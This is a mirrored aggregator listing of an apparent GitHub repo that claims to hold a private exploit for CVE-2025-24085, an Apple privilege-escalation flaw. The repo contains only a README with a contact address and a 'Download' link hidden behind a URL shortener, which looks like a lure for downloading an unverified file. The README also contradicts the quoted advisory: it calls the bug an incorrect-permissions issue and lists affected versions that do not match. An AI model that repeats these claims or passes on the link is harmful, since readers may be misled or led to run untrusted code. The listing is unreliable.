CVE-2025-24085 PoC — Apple iOS和Apple iPadOS 资源管理错误漏洞

Source

https://github.com/bronsoneaver/CVE-2025-24085

Associated Vulnerability

Title:Apple iOS和Apple iPadOS 资源管理错误漏洞 (CVE-2025-24085)
Description:A use after free issue was addressed with improved memory management. This issue is fixed in iOS 18.3 and iPadOS 18.3, iPadOS 17.7.6, macOS Sequoia 15.3, macOS Sonoma 14.7.5, macOS Ventura 13.7.5, tvOS 18.3, visionOS 2.3, watchOS 11.3. A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 17.2.

Description

CVE-2025-24085: Incorrect Default Permissions (CWE-276)

Readme

# CVE-2025-24085


## Overview

A malicious application that can elevate privileges. This issue has been actively exploited against versions of iOS before iOS 17.2. The vulnerability can be used to gain higher-level access to the system, which leads to unauthorized control, data theft, or system compromise.

## Details
+ CVE ID: CVE-2025-24085
+ Published: 2025-01-27
+ Impact: Critical
+ Exploit Availability: Not public, only private.



## Affected Versions

Versions of iOS before **iOS 17.2**
Versions prior to visionOS 2.3
Versions prior to iPadOS 17.7

## Contact
For inquiries, please contact clidanc@thesecure.biz

## Exploit
[Download](https://tinyurl.com/454xyk83)

File Snapshot


 [4.0K]  /data/pocs/38f800e6847d97daf2b0e710e00a315fae2407c4
└── [ 678]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!